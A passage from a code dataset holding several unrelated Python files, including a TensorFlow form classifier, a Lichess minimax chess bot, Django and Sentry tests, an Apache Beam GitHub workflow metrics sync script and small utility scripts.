가공\n#추후 모델에 새로운 데이터만 추가학습하는 로직 구축\nconn = cx_Oracle.connect(connInfo)\ncurs = conn.cursor()\nsql = \"SELECT SEQNUM, DATA, CLASS FROM TBL_FORM_MAPPING\"\ncurs.execute(sql)\nrows = curs.fetchall()\n\ndbData = []\ndbDataLabel = []\n\nfor row in rows:\n floatArr = []\n num = str(row[1]).split(\",\")\n for n in num:\n floatArr.append(float(n))\n\n dbData.append(floatArr)\n dbDataLabel.append(int(row[2]))\n\n\ntestNpData = np.array(dbData)\ntestNpTarget = np.array(dbDataLabel)\n\nfeature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=14)]\n\ncheckpointDir = mlroot + '\\\\FormMapping\\\\checkpoint'\n\nclassifier = tf.contrib.learn.DNNClassifier(feature_columns=feature_columns, hidden_units=[10, 20, 10],\n n_classes=300, model_dir=checkpointDir)\n\narg = sys.argv[1].replace(u\"\\u2022\", u\"\")\n\nif arg == \"training\":\n try:\n if not os.path.isdir(checkpointDir):\n os.mkdir(checkpointDir)\n else:\n # training이 필요한 시점만 True로 전환 기존 모델 삭제\n shutil.rmtree(checkpointDir, False)\n\n # training이 필요한 시점만 True로 전환\n classifier.fit(x=testNpData, y=testNpTarget, steps=2000)\n\n print(str({'code': 200, 'message': 'form mapping train success'}))\n except Exception as e:\n print(str({'code': 500, 'message': 'form mapping train fail', 'error': str(e).replace(\"'\",\"\").replace('\"','')}))\nelse:\n inputArr = 
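# A minimal sketch of the feature-vector assembly the prediction branch below
# performs: two comma-separated SID strings are joined and cast field-by-field
# to float. The zero defaults mirror the script's own placeholders.
def build_feature_vector(company_sid="0,0,0,0,0,0,0",
                         contract_sid="0,0,0,0,0,0,0"):
    return [float(part)
            for part in ",".join((company_sid, contract_sid)).split(",")]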
json.loads(sys.argv[1].replace(u\"\\u2022\", u\"\"))\n\n companySid = ''\n contractSid = ''\n predictArr = []\n predictData = []\n\n try:\n for inputItem in inputArr:\n if 1 == inputItem['formLabel']:\n companySid = inputItem['sid']\n if 2 == inputItem['formLabel']:\n contractSid = inputItem['sid']\n\n if '' == companySid:\n companySid = '0,0,0,0,0,0,0'\n if '' == contractSid:\n contractSid = '0,0,0,0,0,0,0'\n\n for sidItem in ','.join((companySid, contractSid)).split(\",\"):\n predictData.append(float(sidItem))\n\n #db에 일치하는 docSid가 있는 경우 db의 label값을 가져와서 리턴\n predictDocType = {}\n\n for row in rows:\n floatArr = []\n num = str(row[1]).split(\",\")\n for n in num:\n floatArr.append(float(n))\n\n if floatArr == predictData:\n predictDocType['docType'] = int(row[2])\n predictDocType['docAccu'] = 0.99\n\n #db에 일치하는 sid가 없을 경우 ML predict 결과를 리턴\n if 'docType' not in predictDocType:\n predictArr.append(predictData) \n resultArr = list(classifier.predict(np.array(predictArr, dtype=np.float32), as_iterable=True))\n accLabel = []\n accLabel.append(int(resultArr[0]))\n accTarget = np.array(accLabel)\n accuracy_score = classifier.evaluate(x=np.array(predictArr, dtype=float), y=np.array(accTarget, dtype=int))[\"accuracy\"]\n predictDocType['docType'] = resultArr[0]\n if accuracy_score > 0.02:\n accuracy_score -= 0.01\n predictDocType['docAccu'] = accuracy_score\n\n inputArr.append(predictDocType)\n\n print(str(inputArr))\n except Exception as e:\n print(str({'code': 500, 'message': 'form mapping predict fail', 'error': str(e).replace(\"'\",\"\").replace('\"','')}))","sub_path":"ml/FormMapping/eval2.py","file_name":"eval2.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629022665","text":"import chess\nimport os\nimport berserk\nfrom dotenv import load_dotenv\nfrom random import choice\nfrom time import perf_counter\nload_dotenv()\n\nPIECES_VALUES = {\n \"p\": -1,\n \"n\": -3,\n \"b\": -3,\n \"r\": -5,\n \"q\": -9,\n \"k\": 0,\n\n \"P\": 1,\n \"N\": 3,\n \"B\": 3,\n \"R\": 5,\n \"Q\": 9,\n \"K\": 0\n}\n\ndef eval_board(b: chess.Board) -> float:\n if b.result()==\"0-1\":\n return float(\"-inf\")\n if b.result()==\"1-0\":\n return float(\"inf\")\n if b.result()==\"1/2-1/2\":\n return 0\n s = 0\n for square in b.piece_map():\n piece = b.piece_at(square)\n color_sign = (1 if piece.symbol().isupper() else -1)\n\n if chess.SQUARE_NAMES[square.__pos__()] in [\"e4\", \"d4\", \"e5\", \"d5\"]:\n s += 2*color_sign\n\n if piece.symbol() == \"T\" and chess.square_rank(square) == 6:\n s += 2\n if piece.symbol() == \"t\" and chess.square_rank(square) == 1:\n s -= 2\n \n s+=len(b.attacks(square))*color_sign*0.1\n \n s += PIECES_VALUES[piece.symbol()]\n if b.is_check() and b.turn==chess.WHITE:\n s-=2\n if b.is_check() and b.turn==chess.BLACK:\n s+=2\n return s\n\n\ndef min_max(b: chess.Board, depth: int) -> float:\n if depth == 0:\n return eval_board(b)\n if b.turn == chess.WHITE:\n value = float(\"-inf\")\n for move in b.legal_moves:\n b_tmp = b.copy()\n b_tmp.push(move)\n value = max(value, min_max(b_tmp, depth-1))\n return value\n else:\n value = float(\"inf\")\n for move in b.legal_moves:\n b_tmp = b.copy()\n b_tmp.push(move)\n value = min(value, min_max(b_tmp, depth-1))\n return value\n\n\ndef alpha_beta(b: chess.Board, depth: int, alpha=float(\"-inf\"), beta=float(\"inf\")) -> float:\n if depth == 0:\n return eval_board(b)\n if b.turn == chess.WHITE:\n value = float(\"-inf\")\n for move in b.legal_moves:\n b_tmp 
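# The surrounding loop clones the board, recurses, and prunes; a compact,
# board-independent sketch of the same alpha-beta idea over a plain game tree
# (nested lists standing in for positions -- an assumed toy encoding) is:
def alpha_beta_list(node, maximizing, alpha=float("-inf"), beta=float("inf")):
    if not isinstance(node, list):  # leaf: static evaluation
        return node
    best = float("-inf") if maximizing else float("inf")
    for child in node:
        score = alpha_beta_list(child, not maximizing, alpha, beta)
        if maximizing:
            best = max(best, score)
            alpha = max(alpha, best)
        else:
            best = min(best, score)
            beta = min(beta, best)
        if beta <= alpha:  # the opponent will never allow this line; stop searching
            break
    return best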
= b.copy()\n b_tmp.push(move)\n value = max(value, alpha_beta(b_tmp, depth-1, alpha, beta))\n if value>beta:\n return value\n alpha = max(alpha, value)\n else:\n value = float(\"inf\")\n for move in b.legal_moves:\n b_tmp = b.copy()\n b_tmp.push(move)\n value = min(value, alpha_beta(b_tmp, depth-1,alpha,beta))\n if value < alpha:\n return value\n beta = min(beta, value)\n return value\n\n\ndef compute_best_move(b: chess.Board, depth: int, print_moves=True, algo=alpha_beta,) -> str:\n values = []\n for move in b.legal_moves:\n b_copy = b.copy()\n b_copy.push(move)\n values.append(algo(b_copy,depth))\n best_value = max(values) if b.turn else min(values)\n list_legal_moves = [move.uci() for move in b.legal_moves]\n best_moves = [move for i,move in enumerate(list_legal_moves) if values[i]==best_value]\n best_move = choice(best_moves)\n if print_moves:\n print(\"Best move:\", b.san(chess.Move.from_uci(best_move)))\n print(\"Value:\", max(values))\n print()\n return best_move\n\n\ndef turochamp(depth:int) -> None:\n session = berserk.session.TokenSession(os.environ[\"LICHESS_TOKEN\"])\n client = berserk.Client(session)\n b = chess.Board()\n for e in client.bots.stream_incoming_events():\n if e[\"type\"] == \"gameStart\":\n game_id = e[\"game\"][\"id\"]\n game_state_stream = client.bots.stream_game_state(game_id)\n initial_state = next(game_state_stream)\n color = chess.WHITE if \"id\" in initial_state[\"white\"].keys() else chess.BLACK\n moves = initial_state[\"state\"][\"moves\"]\n for m in moves.split(\" \"):\n if m != \"\":\n b.push_uci(m)\n if b.turn==color:\n best_move = compute_best_move(b, depth)\n client.bots.make_move(game_id, best_move)\n for state in game_state_stream:\n last_move = state[\"moves\"].split(\" \")[-1]\n b.push_uci(last_move)\n if b.is_game_over():\n b.reset()\n break\n if b.turn==color:\n best_move = compute_best_move(b, depth)\n client.bots.make_move(game_id, best_move)\n \n\nturochamp(2)\n# b = chess.Board()\n# s = perf_counter()\n# x = compute_best_move(b,0)\n# t = perf_counter()-s\n# print(f\"time:{t}\")\n\n# b.push_san(\"e4\")\n# b.push_san(\"e5\")\n# b.push_san(\"d4\")\n# b.push_san(\"Bb4+\")\n# compute_best_move(b,3)\n# scholar_mate = \"e4 e5 Qh5 Nc6 Bc4 Nf6 Qxf7\"\n# fool_mate = \"f3 e6 g4 Qh4\"\n# for move in fool_mate.split(\" \"):\n# b.push_san(move)\n# print(b.result())\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"145076530","text":"from rest_framework.test import APITestCase, APIClient\nfrom rest_framework import status\nfrom rest_framework.exceptions import ValidationError\n\nfrom api.models import Community\n\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\nimport json\n\nUser = get_user_model()\n\n\nclass TestCreateCommunity(APITestCase):\n\n def setUp(self) -> None:\n self.client = APIClient()\n self.django_community = 'django'\n self.user = User.objects.create(username='crit')\n self.data = {\n 'name': self.django_community,\n 'moderators': [\n {'username': self.user.username}\n ]\n }\n self.client.force_authenticate(user=self.user)\n\n def test_create_community_with_valid_user(self):\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertIn(b'crit', response.content)\n\n def test_cant_create_existing_community(self):\n 
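# The first request creates the community; the identical request issued next
# must then trip the unique-name validation and come back as HTTP 400.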
self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIn(b'name', response.content)\n\n def test_cant_create_community_with_invalid_user(self):\n self.data['moderators'][0]['username'] = 'anon'\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIn(b'moderators', response.content)\n\n def test_create_community_with_two_mods(self):\n User.objects.create(username='anon')\n self.data['moderators'].append({'username': 'anon'})\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertIn(b'anon', response.content)\n self.assertIn(b'crit', response.content)\n\n def test_cant_create_community_with_one_wrong_mod(self):\n self.data['moderators'].append({'username': 'user'})\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIn(b'User with username: user does not exist.', response.content)\n\n def test_cant_create_community_with_duplicate_users(self):\n self.data['moderators'].append({'username': 'crit'})\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n","sub_path":"api/tests/test_community.py","file_name":"test_community.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"22278373","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. 
You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n'''\nThis module queries GitHub to collect Beam-related workflows metrics and put them in\nPostgreSQL.\nThis Script is running every 3 hours in a cloud function in apache-beam-testing project.\nThis cloud function is triggered by a pubsub topic.\nYou can find the cloud function in the next link \nhttps://console.cloud.google.com/functions/details/us-central1/github_actions_workflows_dashboard_sync?env=gen1&project=apache-beam-testing\nPub sub topic : https://console.cloud.google.com/cloudpubsub/topic/detail/github_actions_workflows_sync?project=apache-beam-testing\nCron Job : https://console.cloud.google.com/cloudscheduler/jobs/edit/us-central1/github_actions_workflows_dashboard_sync?project=apache-beam-testing\nWriting the latest 10 runs of every postcommit workflow in master branch in a beammetrics database\n'''\n\nimport os\nimport sys\nimport time\nimport re\nimport requests\nimport psycopg2\n\nfrom datetime import datetime\nfrom github import GithubIntegration \n\nDB_HOST = os.environ['DB_HOST']\nDB_PORT = os.environ['DB_PORT']\nDB_NAME = os.environ['DB_DBNAME']\nDB_USER_NAME = os.environ['DB_DBUSERNAME']\nDB_PASSWORD = os.environ['DB_DBPWD']\nGH_WORKFLOWS_TABLE_NAME = \"github_workflows\"\n# Number of workflows that fetch github API\nGH_NUMBER_OF_WORKFLOWS = 100 \nGH_WORKFLOWS_NUMBER_EXECUTIONS = 100\nWORKFLOWS_OBJECT_LIST = []\n\n\nclass Workflow:\n def __init__(self,id,name,filename):\n self.id = id\n self.name = name\n self.filename = filename\n self.listOfRuns = []\n self.runUrl = []\n\n# The table will save the latest ten run of every workflow\nGH_WORKFLOWS_CREATE_TABLE_QUERY = f\"\"\"\nCREATE TABLE IF NOT EXISTS {GH_WORKFLOWS_TABLE_NAME} (\n job_name text PRIMARY KEY,\n job_yml_filename text\"\"\"\nfor i in range(0,GH_WORKFLOWS_NUMBER_EXECUTIONS):\n i = i + 1\n GH_WORKFLOWS_CREATE_TABLE_QUERY += \"\"\",\\n run{} text,\n run{}Id text\"\"\".format(str(i),str(i))\nGH_WORKFLOWS_CREATE_TABLE_QUERY += \")\\n\"\n\ndef githubWorkflowsGrafanaSync(data,context):\n print('Started')\n print('Updating table with recent workflow runs')\n databaseOperations(initDbConnection(),fetchWorkflowData())\n print('Done')\n return \"Completed\"\n\ndef initDbConnection():\n '''Init connection with the Database'''\n connection = None\n maxRetries = 3\n i = 0 \n while connection == None and i < maxRetries:\n try:\n connection = psycopg2.connect(\n f\"dbname='{DB_NAME}' user='{DB_USER_NAME}' host='{DB_HOST}'\"\n f\" port='{DB_PORT}' password='{DB_PASSWORD}'\")\n except Exception as e:\n print('Failed to connect to DB; retrying in 1 minute')\n print(e)\n time.sleep(60)\n i = i + 1\n if i >= maxRetries:\n print(\"Number of retries exceded \")\n sys.exit(1)\n return connection\n\ndef getToken():\n git_integration = GithubIntegration(\n os.environ[\"GH_APP_ID\"],\n os.environ[\"GH_PEM_KEY\"])\n token=git_integration.get_access_token(\n os.environ[\"GH_APP_INSTALLATION_ID\"]\n ).token\n return token\n\ndef retriesRequest(request):\n requestSucceeded = False\n retryFactor = 1\n while not requestSucceeded:\n retryTime = 60 * retryFactor\n if request.status_code != 200:\n print('Failed to get the request with code {}'.format(request.status_code))\n time.sleep(retryTime)\n retryFactor = retryFactor + retryFactor\n if retryFactor * 60 >= 3600:\n print(\"Error: The request take more than an hour\")\n sys.exit(1)\n else:\n requestSucceeded = True\ndef fetchWorkflowData():\n '''Return a json with all the workflows and the 
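# A minimal sketch of the page-by-page workflow listing performed below; the
# endpoint and page size mirror the constants above, and the unauthenticated
# request is an assumption kept only for illustration.
import requests

def list_workflow_pages(per_page=100):
    url = "https://api.github.com/repos/apache/beam/actions/workflows"
    page, pages = 1, []
    while True:
        response = requests.get(url, params={"branch": "master",
                                             "page": page,
                                             "per_page": per_page})
        body = response.json()
        pages.append(body.get("workflows", []))
        if body.get("total_count", 0) <= per_page * page:
            break
        page += 1
    return pages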
latests\n ten executions'''\n completed = False\n page = 1 \n workflows = []\n try:\n while not completed:\n url = \"https://api.github.com/repos/apache/beam/actions/workflows\"\n queryOptions = { 'branch' : 'master', 'page': page, 'per_page' : GH_NUMBER_OF_WORKFLOWS }\n response = requests.get(url = url, params = queryOptions)\n retriesRequest(response)\n jsonResponse = response.json()\n if jsonResponse['total_count'] >= GH_NUMBER_OF_WORKFLOWS:\n page = page + 1\n workflowsPage = jsonResponse['workflows']\n workflows.append(workflowsPage)\n else:\n completed = True\n workflowsPage = jsonResponse['workflows']\n workflows.append(workflowsPage)\n for pageItem in workflows:\n for item in pageItem:\n path =item['path']\n isPostCommit = re.search('(.*)postcommit(.*)',path)\n if isPostCommit:\n result = re.search('/(.*).yml', path)\n path =(result.group(1)) + \".yml\"\n workflowObject = Workflow(item['id'],item['name'],path)\n WORKFLOWS_OBJECT_LIST.append(workflowObject)\n url = \"https://api.github.com/repos/apache/beam/actions/workflows/\"\n queryOptions = { 'branch' : 'master', 'per_page' : GH_WORKFLOWS_NUMBER_EXECUTIONS,\n 'page' :'1', 'exclude_pull_request':True }\n for workflow in WORKFLOWS_OBJECT_LIST: \n response = requests.get(url = \"{}{}/runs\".format(url,workflow.id),\n params=queryOptions)\n retriesRequest(response)\n responseJson = response.json()\n workflowsRuns = responseJson['workflow_runs']\n for item in workflowsRuns:\n if item['status'] == 'completed':\n workflow.runUrl.append(item['html_url'])\n workflow.listOfRuns.append(item['conclusion'])\n else:\n workflow.listOfRuns.append(item['status'])\n workflow.runUrl.append(item['html_url'])\n for i in range(0,GH_WORKFLOWS_NUMBER_EXECUTIONS): \n if i >= len(workflow.listOfRuns):\n workflow.listOfRuns.append('None')\n workflow.runUrl.append('None')\n except Exception as e:\n print('Failed to get GHA workflows')\n print(e)\n\ndef databaseOperations(connection,fetchWorkflows):\n '''Create the table if not exist and update the table with the latest runs\n of the workflows '''\n queryInsert = \"INSERT INTO {} VALUES \".format(GH_WORKFLOWS_TABLE_NAME)\n cursor = connection.cursor()\n cursor.execute(GH_WORKFLOWS_CREATE_TABLE_QUERY)\n cursor.execute(\"DELETE FROM {};\".format(GH_WORKFLOWS_TABLE_NAME))\n query = \"\"\n for workflow in WORKFLOWS_OBJECT_LIST:\n rowInsert = \"(\\'{}\\',\\'{}\\'\".format(workflow.name,workflow.filename)\n for run, runUrl in zip(workflow.listOfRuns,workflow.runUrl):\n rowInsert += \",\\'{}\\',\\'{}\\'\".format(run,runUrl)\n query = query + rowInsert\n query += \"),\"\n query = query[:-1] + \";\" \n query = queryInsert + query\n cursor.execute(query)\n cursor.close()\n connection.commit()\n connection.close()","sub_path":".test-infra/metrics/sync/github/sync_workflows.py","file_name":"sync_workflows.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217543751","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import url\n\nfrom i_base.api import rest\n\nurlpatterns = [\n url(r'^$', rest.EntrypointView.as_view(), name='entrypoint'),\n # url(r'^users/$', rest.UserView.as_view(), name='user-list'),\n url(r'^users/(?P\\d+)/$', rest.UserView.as_view(), name='user-detail'),\n # url(r'^users/(?P\\d+)/$', rest.UserView.as_view(), name='user-picture'),\n url(r'^users/(?P\\d+)/ideas/$', rest.UserIdeasView.as_view(), name='user-idea-list'),\n url(r'^users/(?P\\d+)/comments/$', rest.UserCommentsView.as_view(), 
name='user-comment-list'),\n url(r'^users/(?P\\d+)/ratings/$', rest.UserRatingsView.as_view(), name='user-ratings-list'),\n url(r'^ideas/$', rest.IdeaListView.as_view(), name='idea-list'),\n url(r'^ideas/(?P\\d+)/$', rest.IdeaView.as_view(), name='idea-detail'),\n url(r'^ideas/(?P\\d+)/comments/$', rest.CommentListView.as_view(), name='idea-comment-list'),\n url(r'^ideas/(?P\\d+)/ratings/$', rest.RatingListView.as_view(), name='idea-rating-list'),\n url(r'^comments/(?P\\d+)/$', rest.CommentView.as_view(), name='comment-detail'),\n url(r'^ratings/(?P\\d+)/$', rest.RatingView.as_view(), name='rating-detail'),\n]\n","sub_path":"i_base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287703358","text":"import unittest\nimport os\nfrom geogitpy.repo import Repository\nimport time\nimport shutil\nfrom geogitpy import geogit\nfrom geogitpy.feature import Feature\nfrom shapely.geometry import Polygon\n\nclass GeogitFeatureTest(unittest.TestCase):\n \n repo = Repository(os.path.join(os.path.dirname(__file__), 'data/testrepo'))\n\n def getTempPath(self):\n return os.path.join(os.path.dirname(__file__), \"temp\", str(time.time())).replace('\\\\', '/')\n\n def getClonedRepo(self):\n src = self.repo.url\n dst = self.getTempPath()\n shutil.copytree(src, dst)\n return Repository(dst)\n\n def testExists(self):\n feature = Feature(self.repo, geogit.HEAD, \"parks/1\") \n self.assertTrue(feature.exists())\n feature = Feature(self.repo, geogit.HEAD, \"wrong/path\") \n self.assertFalse(feature.exists())\n\n def testAttributes(self): \t\n feature = Feature(self.repo, geogit.HEAD, \"parks/1\") \t \n data = feature.attributes() \n self.assertEquals(8, len(data))\n self.assertEquals(\"Public\", data[\"usage\"])\n self.assertTrue(\"owner\" in data)\n self.assertTrue(\"agency\" in data)\n self.assertTrue(\"name\" in data)\n self.assertTrue(\"parktype\" in data)\n self.assertTrue(\"area\" in data)\n self.assertTrue(\"perimeter\" in data) \n self.assertTrue(\"the_geom\" in data) \n self.assertTrue(isinstance(data[\"the_geom\"][0], Polygon)) \n \n def testDiff(self):\n feature = Feature(self.repo, geogit.HEAD, \"parks/5\")\n featureB = Feature(self.repo, geogit.HEAD + \"~1\", \"parks/5\")\n diffs = feature.diff(featureB) \n self.assertTrue(2, len(diffs))\n areas = diffs[\"area\"]\n self.assertEquals(\"15297.503295898438\", areas[1])\n self.assertEquals(\"15246.59765625\", areas[0])\n self.assertTrue(\"the_geom\" in diffs)\n\n def testBlame(self):\n feature = Feature(self.repo, geogit.HEAD, \"parks/5\")\n blame = feature.blame() \n self.assertEquals(8, len(blame))\n attrs = feature.attributes()\n for k,v in blame.iteritems():\n self.assertTrue(v[0], attrs[k])\n\n def testFeatureType(self):\n feature = Feature(self.repo, geogit.HEAD, \"parks/5\")\n ftype = feature.featuretype()\n\n","sub_path":"src/test/featuretest.py","file_name":"featuretest.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"450823709","text":"#!/usr/bin/env python\n\"\"\"\nExample code to plot time series for ECE 8930 second assignment\ntshark, matplotlib, and numpy are required packages for this example code\n\"\"\"\nimport read_pcap\nimport time_series\nimport rand_arr_time\n\ndef example1_plot_time_series_from_pcap_file():\n \"\"\"\n This is an example usage of read_pcap.py\n read_pcap.py reads data from pcap file\n \"\"\"\n 
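# The steps below collect per-packet epoch timestamps (frame.time_epoch) from
# the capture, shift them so the first packet sits at t=0, and hand the
# offsets to the plotting helper.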
files='*.pcap*' # Pcap(ng) files location\n columns=['frame.time_epoch'] # Linux time\n filter_str='' # Filter String\n output_file='a.txt' # Output file\n data=read_pcap.read_pcap_files(files, columns, filter_str, output_file) # Get packets' Linux time, the output is a list of string\n arrive_time=[float(item[0])-float(data[0][0]) for item in data] # Format the list of strings to a list of floating numbers\n time_series.plot_time_series(arrive_time) # Plot time series using packets arrive time\n\ndef example2_plot_time_series_from_simulated_data():\n \"\"\"\n This is an example usage of rand_arr_time.py\n rand_arr_time.py generate a random integer list\n \"\"\"\n option=6 # There are 6 options in total, each use different method to generate random arriving times\n Number_of_packets=10000 # Number of packets generated\n expected_duratation=1000 # Expected length of time in seconds\n arrive_time=rand_arr_time.rand_arr_time(option,Number_of_packets,expected_duratation) # Get packet arrive time, with option 3, 100000 packets, expected in 1000 seconds.\n time_series.plot_time_series(arrive_time) # Plot time series using packets arrive time\n\n\ndef main():\n example1_plot_time_series_from_pcap_file()\n example2_plot_time_series_from_simulated_data()\n\nif __name__ == '__main__':\n main()\n","sub_path":"lab3/plot/plot_time_series_example.py","file_name":"plot_time_series_example.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"327977701","text":"from django.conf.urls import include, patterns, url\n\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom api import views\n\n\nurlpatterns = patterns('',\n # url(r'^', views.api_root),\n url(r'^users/$', views.UserList.as_view(), name='user-list'),\n url(r'^users/(?P[0-9]+)/$', views.UserInstance.as_view(), name='user-detail'),\n url(r'^messages/$', views.MessageList.as_view(), name='message-list'),\n url(r'^messages/(?P[0-9]+)/$', views.MessageInstance.as_view(), name='message-detail'),\n)\n\nurlpatterns += patterns('',\n url(r'^auth/', include('rest_framework.urls',\n namespace='rest_framework')),\n)\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","sub_path":"emberplay/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"284047406","text":"class Solution(object):\n def findPeakElement(self, nums):\n left, right = 0, len(nums) - 1\n while left < right:\n mid = (left + right) // 2\n if nums[mid] > nums[mid + 1]:\n right = mid\n else:\n left = mid + 1\n return left\n\n\nclass Solution(object):\n def findPeakElement(self, nums):\n left = [False] * len(nums)\n right = [False] * len(nums)\n left[0], right[len(nums) - 1] = True, True\n for index in range(1, len(nums)):\n if nums[index] > nums[index - 1]:\n left[index] = True\n for index in range(len(nums) - 2, -1, -1):\n if nums[index] > nums[index + 1]:\n right[index] = True\n for index in range(len(left)):\n if left[index] and right[index]:\n return index\n return -1\n","sub_path":"162/162.find-peak-element.233252346.Accepted.leetcode.py","file_name":"162.find-peak-element.233252346.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440406691","text":"import logging\nimport uuid\nfrom functools import cached_property\nfrom time import 
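# A quick self-check for the binary-search peak finder shown above; the sample
# arrays are illustrative.
def _peak_demo():
    def find_peak(nums):
        lo, hi = 0, len(nums) - 1
        while lo < hi:
            mid = (lo + hi) // 2
            if nums[mid] > nums[mid + 1]:
                hi = mid  # a peak lies at mid or to its left
            else:
                lo = mid + 1  # strictly rising here, so a peak lies to the right
        return lo
    assert find_peak([1, 2, 3, 1]) == 2
    assert find_peak([1, 2, 1, 3, 5, 6, 4]) in (1, 5)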
time\nfrom unittest import mock\n\nfrom django.urls import reverse\n\nfrom sentry.event_manager import EventManager\nfrom sentry.testutils import TestCase\nfrom sentry.testutils.helpers import override_options\nfrom sentry.testutils.performance_issues.event_generators import get_event\n\n\ndef make_event(**kwargs):\n result = {\n \"event_id\": uuid.uuid1().hex,\n \"level\": logging.ERROR,\n \"logger\": \"default\",\n \"tags\": [],\n }\n result.update(kwargs)\n return result\n\n\nnplus_one_no_timestamp = {**get_event(\"n-plus-one-in-django-index-view\")}\ndel nplus_one_no_timestamp[\"timestamp\"]\n\n\nclass DisabledMemberViewTest(TestCase):\n @cached_property\n def path(self):\n return reverse(\"sentry-organization-newest-performance-issue\", args=[self.org.slug])\n\n def setUp(self):\n super().setUp()\n self.owner = self.create_user()\n self.org = self.create_organization(owner=self.owner)\n self.user = self.create_user()\n self.create_member(user=self.user, organization=self.org, role=\"member\")\n self.team1 = self.create_team(organization=self.org, members=[self.user])\n self.team2 = self.create_team(organization=self.org, members=[self.owner])\n self.project1 = self.create_project(organization=self.org, teams=[self.team1])\n self.project2 = self.create_project(organization=self.org, teams=[self.team2])\n self.login_as(self.user)\n\n @override_options({\"store.use-ingest-performance-detection-only\": 1.0})\n @override_options({\"performance.issues.n_plus_one_db.problem-creation\": 1.0})\n def test_simple(self):\n self.project1.update_option(\"sentry:performance_issue_creation_rate\", 1.0)\n self.project2.update_option(\"sentry:performance_issue_creation_rate\", 1.0)\n with mock.patch(\"sentry_sdk.tracing.Span.containing_transaction\"), self.feature(\n {\n \"projects:performance-suspect-spans-ingestion\": True,\n }\n ):\n latest_event_time = time()\n older_event_time = latest_event_time - 300\n\n manager = EventManager(make_event(**nplus_one_no_timestamp, timestamp=older_event_time))\n manager.normalize()\n event1 = manager.save(self.project1.id)\n\n manager = EventManager(\n make_event(**nplus_one_no_timestamp, timestamp=latest_event_time)\n )\n manager.normalize()\n event2 = manager.save(self.project2.id)\n\n # issue error\n manager = EventManager(make_event(timestamp=latest_event_time))\n manager.normalize()\n manager.save(self.project1.id)\n\n resp = self.client.get(self.path, follow=True)\n assert resp.redirect_chain == [\n (f\"/organizations/{self.org.slug}/issues/{event1.groups[0].id}/\", 302)\n ]\n\n self.login_as(self.owner)\n resp = self.client.get(self.path, follow=True)\n assert resp.redirect_chain == [\n (f\"/organizations/{self.org.slug}/issues/{event2.groups[0].id}/\", 302)\n ]\n\n def test_no_performance_issue(self):\n resp = self.client.get(self.path, follow=True)\n assert resp.redirect_chain == [(f\"/organizations/{self.org.slug}/issues/\", 302)]\n","sub_path":"tests/sentry/web/frontend/test_newest_performance_issue.py","file_name":"test_newest_performance_issue.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"360386890","text":"\"\"\"\nThis program collects the weights of all the conv2d and dense layers\nto feed it to the jupyter notebook for analysis.\n\"\"\"\n\nfrom os.path import join, expanduser\n\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.core import Dense\nimport numpy as np\n\nfrom nnclib.model_dict import model_dict\nfrom nnclib.utils 
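# A generic sketch of the layer walk performed below, without the
# project-specific reshape_weights helper (assumed here to be a plain
# flattening of the kernel tensor).
import numpy as np

def dense_conv_weight_shapes(model):
    shapes = []
    for idx, layer in enumerate(model.layers):
        if layer.__class__.__name__ in ("Dense", "Conv2D"):
            kernel = layer.get_weights()[0]
            shapes.append((idx, layer.__class__.__name__.lower(), np.shape(kernel)))
    return shapes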
